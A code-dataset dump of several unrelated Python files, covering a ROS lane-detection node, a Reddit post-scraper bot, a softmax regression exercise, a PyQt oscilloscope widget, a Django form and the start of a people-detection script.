error_manager.data = False\n print(\"temps correct........continuation de la conduite\")\n pub.publish(error_manager)\n t1 =time.time()-s1_time\n\n if t1 > 2 and len(average_line) == 0 :\n error_manager.data = True\n print(\"ligne(s) disparue(s)...... amorcage de l'arret d'urgence\")\n pub.publish(error_manager)\n t1 =time.time()-s1_time\n\n #if error_manager.data == False :\n angle_rad = math.atan(x_offset/y_offset)\n angle_deg = int (angle_rad* 180.0 / math.pi)\n angle_f = angle_deg + 90\n return angle_f\n\n\ndef display_heading_line(image, angle , color = (0,0,255),line_w = 2) :\n heading_image = np.zeros_like(image)\n height = image.shape[0]\n width = image.shape[1]\n \n angle_F = angle / 180.0 * math.pi\n\n x1 = int(width/2)\n y1=height\n x2 = int(x1 - height/ 2 / math.tan(angle_F))\n y2 = int(height/2)\n\n cv2.line(heading_image,(x1,y1),(x2,y2),color,line_w)\n heading_image = cv2.addWeighted(image,0.8,heading_image,1,1)\n return heading_image\n\n#partie inspire de Slim, R. (2020).The complete self-driving car course - applied deep learning.Consult ́e surhttps://www.udemy.com/course/applied-deep-learningtm-the-complete-self-driving-car-course/\n\n \ndef make_coordinates(image, line_parameters):\n ''' global previous_line_parameters\n if line_parameters == None : \n line_parameters = previous_line_parameters\n ''' \n height = image.shape[0]\n width = image.shape[1]\n slope, intercept = line_parameters\n y1 = height\n y2=int(y1*(1-trap_height))\n x1 = max((-width,min(2*width,int(y1-intercept)/slope)))\n x2 = max((-width,min(2*width,int(y2-intercept)/slope)))\n return np.array([x1,y1,x2,y2])\n\n\ndef average_slope_intercept(image,lines):\n lane_lines =[]\n error_manager = Bool()\n if lines is None:\n return lane_lines\n global s1_old \n s1_old= lane_lines\n left_fit= []\n right_fit = []\n\n for line in lines:\n x1,y1,x2,y2 = line.reshape(4)\n # if x1 ==x2:\n # slopet = 999.\n slopet = (y2-y1)/(x2-x1)\n #------------!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!checker reaction du filtrage des lignes\n #if abs(slopet) < 800 : \n parameters = np.polyfit((x1,x2),(y1,y2),1)\n slope = parameters[0]\n intercept = parameters[1]\n if slope < 0 :\n left_fit.append((slope,intercept))\n else:\n right_fit.append((slope,intercept))\n\n left_fit_average = np.average(left_fit,axis = 0)\n if len(left_fit) >0:\n lane_lines.append(make_coordinates(image,left_fit_average))\n\n right_fit_average = np.average(right_fit,axis = 0)\n if len(right_fit) >0:\n lane_lines.append( make_coordinates(image,right_fit_average))\n\n \n if len(lane_lines) !=0 :\n error_manager.data = False\n pub.publish(error_manager)\n\n return lane_lines\n\n\n\ndef canny(image):\n gray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\n blur = cv2.GaussianBlur(gray,(5,5),0)\n canny_img=cv2.Canny(blur,220,150)\n return canny_img\n\ndef display_lines(image,lines) : \n line_image = np.zeros_like(image)\n if lines is not None:\n for line in lines:\n x1,y1,x2,y2 = line.reshape(4)\n pts = np.array([[x1,y1],[x2,y2]],np.int32)\n cv2.polylines(line_image,[pts],True, (255,255,0),3)\n\n return line_image\n\n\ndef region_of_interest(image):\n h = image.shape[0]\n w = image.shape[1]\n polygons = np.array([[\\\n ((w*(1-trap_bottom_width))//2,h),\\\n ((w*(1-trap_top_width))//2,h-h*trap_height),\\\n (w-(w*(1-trap_top_width))//2,h-h*trap_height),\\\n (w-(w*(1-trap_bottom_width))//2,h) ]]\\\n , dtype=np.int32)\n mask = np.zeros_like(image)\n cv2.fillConvexPoly(mask,polygons,255)\n masked_image =cv2.bitwise_and(image,mask)\n\n return masked_image\n\n\n##=======================================================================================\n\ns1_old = 0\ns2_old = 0\ns1 = 0\nt1 = 0.0\nt2 = 0.0\ns2 = 0\n\ns2_time = 0.0\nth1 = 75\nth2 = 150\nstop =0\nk= 1 \n\n# ======================================================================================== \n\n\ndef callback(image):\n global ang_cl\n global thetaf\n global Time\n #ang_cl.y est la valeur precedente\n ang_cl.y = ang_cl.x\n try :\n img = bridge.imgmsg_to_cv2(image, \"bgr8\")\n except CvBridgeError as e:\n print(e)\n\n\n #prendre les colonne, ligne et channel\n (ligne,colonne,channels) = img.shape\n print (ligne)\n print (colonne)\n #cv2.imshow('try',img)\n key = cv2.waitKey(10) & 0xFF\n if key == ord(\"q\"):\n raise Exception(\"on sort\")\n\n # faire copy de l'image\n img_clone = img.copy()\n\n #-------------------newcod------------------------------------------ \n\n canny_image = canny(img_clone)\n cropped_image = region_of_interest(canny_image)\n \n lines = cv2.HoughLinesP(cropped_image,rho,theta,threshold,np.array([]),minLineLength=min_line_length\n ,maxLineGap=max_line_gap)\n averaged_lines = average_slope_intercept(img_clone,lines)\n \n\n\n line_image = display_lines(img_clone,averaged_lines)\n \n combo_image = cv2.addWeighted(img_clone,0.8,line_image,1,1)\n angle = give_angle(combo_image, averaged_lines)\n #ang_cl.x est la nouvelle valeur\n anglep = angle-90\n anglepp = anglep / 180.0 * math.pi\n ang_cl.x = anglepp\n print(anglepp)\n #T1 = time.time() - Time\n # thetaf.append((T1 , anglepp))\n \n\n #update_fonc()\n #plt.show()\n #ang_cl.z est le nombre de ligne\n ang_cl.z = len(averaged_lines)\n #publier les informations\n pub1.publish(ang_cl)\n final_image= display_heading_line(combo_image , angle)\n cv2.imshow('Afficher camera',final_image)\n #---------------------fin code--------------------------------------- \n\n'''\n #transformer l'imagae en gris pour capteur 1\n gris = cv2.cvtColor(img_clone[ymin:ymax, xmin1:xmax1],cv2.COLOR_BGR2GRAY)\n if k!=1:\n gris = cv2.blur(gris,(k,k))\n \n #appliquer canny\n capteur1 = cv2.Canny(gris,th1,th2)\n\n #transformer l'imagae en gris pour capteur 2\n gris2 = cv2.cvtColor(img_clone[ymin:ymax, xmin2:xmax2],cv2.COLOR_BGR2GRAY)\n if k!=1:\n gris2 = cv2.blur(gris2,(k,k))\n \n #appliquer canny\n capteur2 = cv2.Canny(gris2,th1,th2)\n \n cv2.rectangle(img_clone,(xmin1,ymin),(xmax1,ymax),(0,0,255),1)\n cv2.rectangle(img_clone,(xmin2,ymin),(xmax2,ymax),(0,0,255),1)\n\n s1 = point(capteur1[0])\n if s1!=-1:\n cv2.circle(img_clone,(s1+xmin1,ymin),3,(0,255,0), 3)\n s1_old =s1\n global s1_time \n s1_time= time.time()\n else :\n global t1\n t1 =time.time()-s1_time\n if t1 < 4:\n cv2.circle(img_clone,(s1_old+xmin1,ymin),3,(100,255,255),3)\n s1=s1_old\n else :\n s1=-1\n\n s2 = point(capteur2[0])\n if s2!=-1:\n cv2.circle(img_clone,(s2+xmin2,ymin),3,(0,255,0), 3)\n s2_old =s2\n global s2_time \n s2_time = time.time()\n else :\n t2 = time.time()-s2_time \n if t2< 4:\n cv2.circle(img_clone,(s2_old+xmin2,ymin),3,(100,255,255),3)\n s2=s2_old\n else :\n s2=-1\n\n cv2.circle(img_clone,(160,120),3,(10,10,10),3)\n\n cv2.circle(img_clone,(abs((s2+xmin2-s1)/2),ymin),3,(100,100,255),3)\n\n if s1!=-1 and s2!=-1:\n error_manager.data = False\n pub.publish(error_manager)\n s2_= abs(xmax2-xmin2-s2)\n if abs(s2_-s1) > 20 :\n c = (0,max(0,255-10*int(abs(s1-s2_)/2)),min(255,10*int(abs(s1-s2_)/2)))\n cv2.arrowedLine(img_clone, (int((xmax2-xmin1)/2)+xmin1,ymax-25),(int((xmax2-xmin1)/2)+xmin1+2*int((s1-s2_)/2),ymax-25),c,3,tipLength=0.4)\n else :\n cv2.putText(img_clone,\"ok\",(int((xmax2-xmin1)/2)+xmin1-15,ymax-16),cv2.FONT_HERSHEY_COMPLEX_SMALL,1,(0,255,0),1)\n elif (s1==-1 or s2==-1) and (t1 > 15 or t2 >= 15) :\n \n'''\n \n \n\ndef main(args):\n # if __name__ == '__main__':\n global pub\n global pub1\n global pub2\n global thetaf\n\n\n # ax.set_facecolor('#DEDEDE')\n rospy.init_node('traitement')\n\n pub = rospy.Publisher(\"/traitement/error_manager\",Bool,queue_size=10)\n \n pub2 = rospy.Publisher(\"/traitement/filtre\",Float64,queue_size=10)\n\n pub1 = rospy.Publisher(\"/control/angle\",Point,queue_size=10)\n\n image = rospy.Subscriber(\"/raspicam_node/image\", Image, callback)\n \n rospy.spin()\n\n\n#------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n#------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n\n\n\nif __name__ == '__main__':\n main(sys.argv)\n\n \n\n","sub_path":"src/images_process/scripts/traitement.py","file_name":"traitement.py","file_ext":"py","file_size_in_byte":12373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"128815241","text":"#/u/GoldenSights\nimport traceback\nimport praw # simple interface to the reddit API, also handles rate limiting of requests\nimport time\nimport datetime\nimport pickle\nimport string\n\n'''USER CONFIGURATION'''\n\nUSERNAME = \"\"\n#This is the bot's Username. In order to send mail, he must have some amount of Karma.\nPASSWORD = \"\"\n#This is the bot's Password. \nUSERAGENT = \"NSALeaks Content scrapper. To be used to populate a list to be used for More Article section of /r/NSALeaks wiki\"\n#This is a short description of what the bot does. For example \"/u/GoldenSights' Newsletter bot\"\nSUBREDDIT = \"nsaleaks\"\n#This is the sub or list of subs to scan for new posts. For a single sub, use \"sub1\". For multiple subs, use \"sub1+sub2+sub3+...\". For all use \"all\"\nKEYWORDS = string.ascii_letters\n#Words to look for\nKEYDOMAINS = []\n#Domains to look for\nKEYNAMES = [\"\"]\n#Names to look for\n\nIGNORESELF = False\n#Do you want the bot to dump selfposts? Use True or False (Use capitals! No quotations!)\nTIMESTAMP = '%A %d %B %Y'\n#The time format.\n# \"%A %d %B %Y\" = \"Wendesday 04 June 2014\"\n#http://docs.python.org/2/library/time.html#time.strftime\n\nHEADER = \"\"\n#Put this at the top of the .txt file\n\n#FORMAT = \"_timestamp_: [_title_](_url_) - /u/_author_ - [**Discussion**](_nplink_)\"\nFORMAT = \">>\\n* [_title_](_url_) - _flairtext_\\n>>\"\nTSFORMAT = \">_timestamp_\\n\"\n#USE THESE INJECTORS TO CREATE CUSTOM OUTPUT\n#_timestamp_ which follows the TIMESTAMP format\n#_title_\n#_url_\n#_subreddit_\n#_nplink_\n#_author_\n#_numcomments_\n#_score_\n\nPRINTFILE = \"nsa\"\n#Name of the file that will be produced. Do not type the file extension\n\nMAXPOSTS = 100\n#This is how many posts you want to retrieve all at once.\n\nREAD_FROM_FILE = \"botwatch.db\"\n# A text file where a post ID is on each line\n# These will be collected before anything from /new\n\n'''All done!'''\n\ntry:\n import bot #This is a file in my python library which contains my Bot's username and password. I can push code to Git without showing credentials\n USERNAME = bot.uG\n PASSWORD = bot.pG\n USERAGENT = bot.aG\nexcept ImportError:\n pass\n\nprint('Logging in as ' + USERNAME)\nr = praw.Reddit(USERAGENT)\nr.login(USERNAME, PASSWORD)\n\ndef scansub():\n\tlista = []\n\tcount = 0\n\tcounta = 0\n\ttry:\n\t\tprint('Scanning.')\n\t\tsubreddit = r.get_subreddit(SUBREDDIT)\n\t\tposts = subreddit.get_new(limit=MAXPOSTS)\n\t\tfor post in posts:\n\t\t\tif not post.is_self or IGNORESELF == False:\n\t\t\t\ttry:\n\t\t\t\t\tauthor = post.author.name\n\t\t\t\texcept Exception:\n\t\t\t\t\tauthor = '[DELETED]'\n\t\t\t\tif any(m.lower() in post.title.lower() for m in KEYWORDS) \\\n\t\t\t\tor any(m.lower() in post.url.lower() for m in KEYDOMAINS) \\\n\t\t\t\tor any(m.lower() == author.lower() for m in KEYNAMES):\n\t\t\t\t\tlista.append(post)\n\t\t\t\t\tcounta += 1\n\t\t\tcount += 1\n\t\t\tprint('%d / %d | %d' % (count, MAXPOSTS, counta))\n\t\t\n\t\tfor item in lista:\n\t\t\tif item.author is None:\n\t\t\t\titem.author = '[DELETED]'\n\texcept Exception:\n\t\ttraceback.print_exc()\n\tprint('Collected ' + str(counta) + ' items.')\n\treturn lista\n\ndef scanfile():\n\tidfile = open(READ_FROM_FILE)\n\tlines = [line.strip() for line in idfile.readlines()]\n\tidfile.close()\n\tfor lineindex in range(len(lines)):\n\t\tif 't3_' not in lines[lineindex]:\n\t\t\tlines[lineindex] = 't3_' + lines[lineindex]\n\tfilesize = len(lines)\n\tprint('Found %d ids in file %s' % (filesize, READ_FROM_FILE_IDS))\n\n\tlista = []\n\tcount = 0\n\twhile len(lines) > 0:\n\t\tposts = list(r.get_info(thing_id=lines[:100]))\n\t\tlines = lines[100:]\n\t\tfor post in posts:\n\t\t\tif post.author is None:\n\t\t\t\tpost.author = '[DELETED]'\n\t\t\tlista.append(post)\n\t\t\tcount += 1\n\t\tprint('%d / %d' % (count, filesize))\n\treturn lista\n\n\ndef work(lista, listfile):\n\tif HEADER != \"\":\n\t\tprint(HEADER, file=listfile)\n\tprevious_timestamp = \"\"\n\tfor post in lista:\n\t\ttimestamp = post.created_utc\n\t\ttimestamp = datetime.datetime.fromtimestamp(int(timestamp)).strftime(TIMESTAMP)\n\t\tfinal = FORMAT\n\t\tif timestamp != previous_timestamp:\n\t\t\tfinal = TSFORMAT + final\n\t\tfinal = final.replace('_timestamp_', timestamp)\n\t\tfinal = final.replace('_title_', post.title)\n\t\tflair_text = post.link_flair_text if post.link_flair_text else \"\"\n\t\tflair_css = post.link_flair_css_class if post.link_flair_css_class else \"\"\n\t\tpost.link_flair_text = flair_text\n\t\tpost.link_flair_css_class = flair_css\n\t\tfinal = final.replace('_flairtext_', flair_text)\n\t\tfinal = final.replace('_flaircss_', flair_css)\n\t\ttry:\n\t\t\tfinal = final.replace('_author_', post.author.name)\n\t\texcept Exception:\n\t\t\tfinal = final.replace('_author_', '[DELETED]')\n\t\tfinal = final.replace('_subreddit_', post.subreddit.display_name)\n\t\turl = post.url\n\t\turl = url.replace('http://www.reddit.com', 'http://np.reddit.com')\n\t\tfinal = final.replace('_url_', url)\n\t\tslink = post.short_link\n\t\tslink = slink.replace('http://', 'http://np.')\n\t\tfinal = final.replace('_nplink_', slink)\n\t\tfinal = final.replace('_flairtext_', flair_text)\n\t\tfinal = final.replace('_score_', str(post.score))\n\t\tfinal = final.replace('_numcomments_', str(post.num_comments))\n\t\tprint(final, file=listfile)\n\t\tprevious_timestamp = timestamp\n\n\ndef writeindividual(printstatement, lista, sortmode, reverse, filesuffix):\n\tprint(printstatement)\n\tlista.sort(key=sortmode, reverse=reverse)\n\tlistfile = open(PRINTFILE + filesuffix, 'w', encoding='utf-8')\n\twork(lista, listfile)\n\tlistfile.close()\n\n\ndef writefiles(lista):\n\twriteindividual('Writing time file', lista,\n\t\tlambda x:x.created_utc, True, '_date.txt')\n\t\n\twriteindividual('Writing subreddit file', lista,\n\t\tlambda x:x.subreddit.display_name.lower(), False, '_subreddit.txt')\n\t\n\twriteindividual('Writing title file', lista,\n\t\tlambda x:x.title.lower(), False, '_title.txt')\n\t\n\twriteindividual('Writing author file', lista,\n\t\tlambda x:x.author.name.lower(), False, '_author.txt')\n\t\n\tprint('Writing flair file')\n\tnow = datetime.datetime.now(datetime.timezone.utc).timestamp()\n\tlista.sort(key=lambda x: (x.link_flair_text, now-x.created_utc))\n\tfor index in range(len(lista)):\n\t\tif lista[index].link_flair_text != \"\":\n\t\t\tlista = lista[index:] + lista[:index]\n\t\t\tbreak\n\tlistfile = open(PRINTFILE + '_flair.txt', 'w', encoding='utf-8')\n\twork(lista, listfile)\n\tlistfile.close()\n\t\n\tprint('Saving to Pickle.')\n\tclass Posted(object):\n\t\tpass\n\tlistc = []\n\tfor item in lista:\n\t\tobj = Posted()\n\t\tobj.id = item.id\n\t\tobj.fullname = item.fullname\n\t\tobj.created_utc = item.created_utc\n\t\tobj.title = item.title\n\t\tobj.subreddit = item.subreddit.display_name\n\t\tobj.url = item.url\n\t\tobj.short_link = item.short_link\n\t\ttry:\n\t\t\tobj.author = item.author.name\n\t\texcept:\n\t\t\tobj.author = '[DELETED]'\n\t\tif item.is_self == True:\n\t\t\tobj.is_self = True\n\t\t\tobj.selftext = item.selftext\n\t\telse:\n\t\t\tobj.is_self = False\n\t\tlistc.append(obj.__dict__)\n\tfilec = open(PRINTFILE + '.p', 'wb')\n\tpickle.dump(listc, filec)\n\tfilec.close()\n\tprint('Done.')\n\ndef removeduplicates(lista):\n\tprint('Removing duplicate posts in list')\n\tnodupes = []\n\tfor post in lista:\n\t\tif not any(p.id == post.id for p in nodupes):\n\t\t\tnodupes.append(post)\n\treturn nodupes\n\n\ndef main():\n\tlista = []\n\tif READ_FROM_FILE_IDS:\n\t\tscanfile()\n\telse:\n\t\tlista = scansub()\n\t\tlista = removeduplicates(lista)\n\n\twritefiles(lista)\n\nmain()\nquit()","sub_path":"Redmash/redmash_new.py","file_name":"redmash_new.py","file_ext":"py","file_size_in_byte":7059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"422821599","text":"import sys\nsys.path.append(\"..\")\nimport utils\nfrom utils import *\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.sparse as sparse\n\n\ndef augment_feature_vector(X):\n \"\"\"\n Adds the x[i][0] = 1 feature for each data point x[i].\n\n Args:\n X - a NumPy matrix of n data points, each with d - 1 features\n\n Returns: X_augment, an (n, d) NumPy array with the added feature\n for each datapoint\n \"\"\"\n column_of_ones = np.zeros([len(X), 1]) + 1\n return np.hstack((column_of_ones, X))\n\n\ndef compute_probabilities(X, theta, temp_parameter):\n \"\"\"\n Computes, for each datapoint X[i], the probability that\n X[i] is labeled as j\n for j = 0, 1, ..., k-1\n\n Args:\n X - (n, d) NumPy array (n datapoints each with d features)\n theta - (k, d) NumPy array, where row j represents the parameters\n of our model for label j\n temp_parameter - the temperature parameter of softmax function (scalar)\n Returns:\n H - (k, n) NumPy array, where each entry H[j][i] is the probability\n that X[i] is labeled as j\n \"\"\"\n\n expsum = 0\n H = np.zeros((theta.shape[0], X.shape[0]))\n multmat = np.dot(X, theta.T)\n cmax = np.max(multmat/temp_parameter, axis=1)\n\n expsum = np.sum(np.exp((multmat/temp_parameter).T-cmax), axis=0)\n\n H = (1/expsum) * np.exp((multmat/temp_parameter).T-cmax)\n\n return H\n\n\ndef compute_cost_function(X, Y, theta, lambda_factor, temp_parameter):\n \"\"\"\n Computes the total cost over every datapoint.\n\n Args:\n X - (n, d) NumPy array (n datapoints each with d features)\n Y - (n, ) NumPy array containing the labels (a number from 0-9)\n for each data point\n theta - (k, d) NumPy array, where row j represents the parameters\n of our model for label j\n lambda_factor - the regularization constant (scalar)\n temp_parameter - the temperature parameter of softmax function (scalar)\n\n Returns\n c - the cost value (scalar)\n \"\"\"\n\n loss = 0\n\n probs = compute_probabilities(X, theta, temp_parameter).T\n\n mask = np.ones((probs.shape[0], probs.shape[1]))\n\n for i in range(probs.shape[0]):\n for j in range(probs.shape[1]):\n if Y[i] == j:\n mask[i, j] = False\n\n masked = np.ma.array(probs, mask=mask)\n\n loss = np.sum(np.log(masked))\n theta_sum = 0.5 * lambda_factor * np.sum(theta**2)\n\n return (-1/probs.shape[0])*loss+theta_sum\n\n\ndef run_gradient_descent_iteration(X, Y, theta, alpha,\n lambda_factor, temp_parameter):\n \"\"\"\n Runs one step of batch gradient descent\n\n Args:\n X - (n, d) NumPy array (n datapoints each with d features)\n Y - (n, ) NumPy array containing the labels (a number from 0-9)\n for each data point\n theta - (k, d) NumPy array, where row j represents the parameters\n of our model for label j\n alpha - the learning rate (scalar)\n lambda_factor - the regularization constant (scalar)\n temp_parameter - the temperature parameter of softmax function (scalar)\n\n Returns:\n theta - (k, d) NumPy array that is the final value of parameters theta\n \"\"\"\n\n probs = compute_probabilities(X, theta, temp_parameter).T\n grad = np.zeros((theta.shape[0], theta.shape[1]))\n\n mask = [[1 if Y[i] == j else 0 for j in range(probs.shape[1])]\n for i in range(probs.shape[0])]\n\n mask_s = sparse.coo_matrix(mask)\n probs_s = sparse.coo_matrix(probs)\n X_s = sparse.coo_matrix(X)\n\n tempsum = np.dot(X_s.T, mask_s-probs_s).T\n\n grad = (-1/(X.shape[0]*temp_parameter)) * tempsum + lambda_factor * theta\n\n return np.array(theta-alpha*grad)\n\n\ndef update_y(train_y, test_y):\n \"\"\"\n Changes the old digit labels for the training and test set for\n the new (mod 3) labels.\n\n Args:\n train_y - (n, ) NumPy array containing the labels\n (a number between 0-9) for each datapoint in the training set\n test_y - (n, ) NumPy array containing the labels (a number between 0-9)\n for each datapoint in the test set\n\n Returns:\n train_y_mod3 - (n, ) NumPy array containing the new labels\n (a number between 0-2) for each datapoint in the training set\n test_y_mod3 - (n, ) NumPy array containing the new labels\n (a number between 0-2) for each datapoint in the test set\n \"\"\"\n train_y_mod3 = np.mod(train_y, 3)\n test_y_mod3 = np.mod(test_y, 3)\n\n return train_y_mod3, test_y_mod3\n\n\ndef compute_test_error_mod3(X, Y, theta, temp_parameter):\n \"\"\"\n Returns the error of these new labels when the classifier predicts\n the digit. (mod 3)\n\n Args:\n X - (n, d - 1) NumPy array (n datapoints each with d - 1 features)\n Y - (n, ) NumPy array containing the labels (a number from 0-2)\n for each data point\n theta - (k, d) NumPy array, where row j represents the parameters\n of our model for label j\n temp_parameter - the temperature parameter of softmax function (scalar)\n\n Returns:\n test_error - the error rate of the classifier (scalar)\n \"\"\"\n count = 0\n Y_test = np.mod(get_classification(X, theta, temp_parameter), 3)\n\n for i in range(Y.shape[0]):\n if Y[i] != Y_test[i]:\n count += 1\n return count/Y.shape[0]\n\n\ndef softmax_regression(X, Y, temp_parameter, alpha,\n lambda_factor, k, num_iterations):\n \"\"\"\n Runs batch gradient descent for a specified number of iterations\n on a dataset with theta initialized to the all-zeros array.\n Here, theta is a k by d NumPy array\n where row j represents the parameters of our model for label j for\n j = 0, 1, ..., k-1\n\n Args:\n X - (n, d - 1) NumPy array (n data points, each with d-1 features)\n Y - (n, ) NumPy array containing the labels (a number from 0-9)\n for each data point\n temp_parameter - the temperature parameter of softmax function (scalar)\n alpha - the learning rate (scalar)\n lambda_factor - the regularization constant (scalar)\n k - the number of labels (scalar)\n num_iterations - the number of iterations to run gradient\n descent (scalar)\n\n Returns:\n theta - (k, d) NumPy array that is the final value of parameters theta\n cost_function_progression - a Python list containing\n the cost calculated at each step of gradient descent\n \"\"\"\n X = augment_feature_vector(X)\n theta = np.zeros([k, X.shape[1]])\n cost_function_progression = []\n for i in range(num_iterations):\n cost_function_progression.append(\n compute_cost_function(X, Y,\n theta,\n lambda_factor,\n temp_parameter))\n theta = run_gradient_descent_iteration(\n X, Y, theta, alpha, lambda_factor, temp_parameter)\n return theta, cost_function_progression\n\n\ndef get_classification(X, theta, temp_parameter):\n \"\"\"\n Makes predictions by classifying a given dataset\n\n Args:\n X - (n, d - 1) NumPy array (n data points, each with d - 1 features)\n theta - (k, d) NumPy array where row j represents the parameters\n of our model for label j\n temp_parameter - the temperature parameter of softmax function (scalar)\n\n Returns:\n Y - (n, ) NumPy array, containing the predicted label\n (a number between 0-9) for each data point\n \"\"\"\n X = augment_feature_vector(X)\n probabilities = compute_probabilities(X, theta, temp_parameter)\n return np.argmax(probabilities, axis=0)\n\n\ndef plot_cost_function_over_time(cost_function_history):\n plt.plot(range(len(cost_function_history)), cost_function_history)\n plt.ylabel('Cost Function')\n plt.xlabel('Iteration number')\n plt.show()\n\n\ndef compute_test_error(X, Y, theta, temp_parameter):\n assigned_labels = get_classification(X, theta, temp_parameter)\n return 1 - np.mean(assigned_labels == Y)\n","sub_path":"project_2/softmax.py","file_name":"softmax.py","file_ext":"py","file_size_in_byte":8020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"79049898","text":"\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nimport pyqtgraph as pg\n\n\nimport numpy as np\n\n\nfrom .singleChannel_ui import Ui_Form\n\n\nimport scipy.integrate as spi\n\n\nimport re\nraise RuntimeError(\"this file shoulnd't be called from ehre\")\n\npg.setConfigOption('background', 'w')\npg.setConfigOption('foreground', 'k')\n\nclass ScopeViewWidget(QtWidgets.QWidget):\n sigBoxcarValue = QtCore.pyqtSignal(object)\n sigUpdateData = QtCore.pyqtSignal()\n\n def __init__(self, name=None):\n super(ScopeViewWidget,self).__init__()\n self.name = name\n self.initSettings()\n self.initUI()\n self.sigUpdateData.connect(self.updatePlots)\n self.data = np.array([])\n\n def __str__(self):\n return self.name\n\n def initSettings(self):\n s = dict()\n s['bcpyBG'] = [0, 0]\n s['bcpySG'] = [0, 0]\n\n self.settings = s\n\n def initUI(self):\n #Import ui file from designer\n self.ui = Ui_Form()\n self.ui.setupUi(self)\n\n self.pPlot = self.ui.gPlot.plot(pen='k')\n plotitem = self.ui.gPlot.getPlotItem()\n plotitem.setTitle(self.name)\n plotitem.setLabel('bottom',text='Time',units='s')\n plotitem.setLabel('left',text='Voltage', units='V')\n\n #Make an array of all the textboxes for the linear regions to make it\n #easier to iterate through them. Set it up in memory identical to how it\n #appears on the panel for sanity, in a row-major fashion\n lrtb = [[self.ui.tBGStart, self.ui.tBGEnd],\n [self.ui.tSGStart, self.ui.tSGEnd]]\n # Connect the changes to update the Linear Regions\n for i in lrtb:\n for j in i:\n j.textAccepted.connect(self.updateLinearRegionsFromText)\n\n self.linearRegionTextBoxes = lrtb\n self.initLinearRegions()\n\n self.ui.bInit.clicked.connect(self.setLinearRegions)\n\n def initLinearRegions(self, item = None):\n #initialize array for all 5 boxcar regions\n self.boxcarRegions = [None]*2\n\n bgCol = pg.mkBrush(QtGui.QColor(255, 0, 0, 50))\n sgCol = pg.mkBrush(QtGui.QColor(0, 255, 0, 50))\n\n #Background region for the plot\n self.boxcarRegions[0] = pg.LinearRegionItem(self.settings['bcpyBG'], brush = bgCol)\n self.boxcarRegions[1] = pg.LinearRegionItem(self.settings['bcpySG'], brush = sgCol)\n\n #Connect it all to something that will update values when these all change\n for i in self.boxcarRegions:\n i.sigRegionChangeFinished.connect(self.updateLinearRegionValues)\n\n if item is None:\n item = self.ui.gPlot\n item.addItem(self.boxcarRegions[0])\n item.addItem(self.boxcarRegions[1])\n\n\n def updateLinearRegionValues(self):\n sender = self.sender()\n sendidx = -1\n for (i, v) in enumerate(self.boxcarRegions):\n #I was debugging something. I tried to use id(), which is effectively the memory\n #location to try and fix it. Found out it was anohter issue, but\n #id() seems a little safer(?) than just equating them in the sense that\n #it's explicitly asking if they're the same object, isntead of potentially\n #calling some weird __eq__() pyqt/graph may have set up\n if id(sender) == id(v):\n sendidx = i\n i = sendidx\n #Just being paranoid, no reason to think it wouldn't find the proper thing\n if sendidx<0:\n return\n self.linearRegionTextBoxes[i][0].setText('{:.9g}'.format(sender.getRegion()[0]))\n self.linearRegionTextBoxes[i][1].setText('{:.9g}'.format(sender.getRegion()[1]))\n\n # Update the dicionary values so that the bounds are proper when\n d = {0: \"bcpyBG\",\n 1: \"bcpySG\"\n }\n self.settings[d[i]] = list(sender.getRegion())\n\n def updateLinearRegionsFromText(self):\n sender = self.sender()\n #figure out where this was sent\n sendi, sendj = -1, -1\n for (i, v)in enumerate(self.linearRegionTextBoxes):\n for (j, w) in enumerate(v):\n if id(w) == id(sender):\n sendi = i\n sendj = j\n\n i = sendi\n j = sendj\n curVals = list(self.boxcarRegions[i].getRegion())\n curVals[j] = float(sender.text())\n self.boxcarRegions[i].setRegion(tuple(curVals))\n # Update the dicionary values so that the bounds are proper when\n d = {0: \"bcpyBG\",\n 1: \"bcpySG\",\n }\n self.settings[d[i]] = list(curVals)\n\n def setLinearRegions(self):\n try:\n length = self.data.shape[0]\n except:\n return\n newVal = self.data[int(length/2), 0]\n for i in self.boxcarRegions:\n i.setRegion((newVal, newVal))\n\n def updateData(self, data):\n self.data = data\n self.sigUpdateData.emit()\n\n def updatePlots(self):\n self.pPlot.setData(self.data)\n bg, sg = self.integrateData()\n self.ui.tBGBoxcar.setText(\"{:.5g}\".format(bg))\n self.ui.tSGBoxcar.setText(\"{:.5g}\".format(sg))\n self.sigBoxcarValue.emit(sg-bg)\n\n def changeName(self, name):\n self.name = name\n plotitem = self.ui.gPlot.getPlotItem()\n plotitem.setTitle(self.name)\n\n @staticmethod\n def findIndices(values, dataset):\n \"\"\"Given an ordered dataset and a pair of values, returns the indices which\n correspond to these bounds \"\"\"\n indx = list((dataset>values[0]) & (dataset date_of_admission:\n self._errors[\"date_of_birth\"] = self.error_class([_(\"Can't be born after admission!\")])\n self._errors[\"date_of_admission\"] = self.error_class([_(\"Can't be born after admission!\")])\n del cleaned_data[\"date_of_birth\"]\n del cleaned_data[\"date_of_admission\"]\n\n\n if date_of_surgical_procedure < date_of_admission:\n self._errors[\"date_of_surgical_procedure\"] = self.error_class([_(\"Can't be operated before admission!\")])\n self._errors[\"date_of_admission\"] = self.error_class([_(\"Can't be operated before admission!\")])\n del cleaned_data[\"date_of_surgical_procedure\"]\n del cleaned_data[\"date_of_admission\"]\n\n if date_of_surgical_procedure > date_of_discharge:\n self._errors[\"date_of_surgical_procedure\"] = self.error_class([_(\"Can't be operated after discharge!\")])\n self._errors[\"date_of_discharge\"] = self.error_class([_(\"Can't be operated after discharge!\")])\n del cleaned_data[\"date_of_surgical_procedure\"]\n del cleaned_data[\"date_of_discharge\"]\n\n return cleaned_data\n\n class Meta:\n model = c8\n exclude = ('added_by')\n\nclass FileUploadForm(forms.Form):\n file = forms.FileField()","sub_path":"report_forms/c8/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"591432294","text":"import cv2\r\nimport imutils\r\nimport numpy as np\r\n\r\nfrom detect_people import detect_people_classes\r\nfrom scipy.spatial import distance as dist\r\n\r\n\r\nlabels = 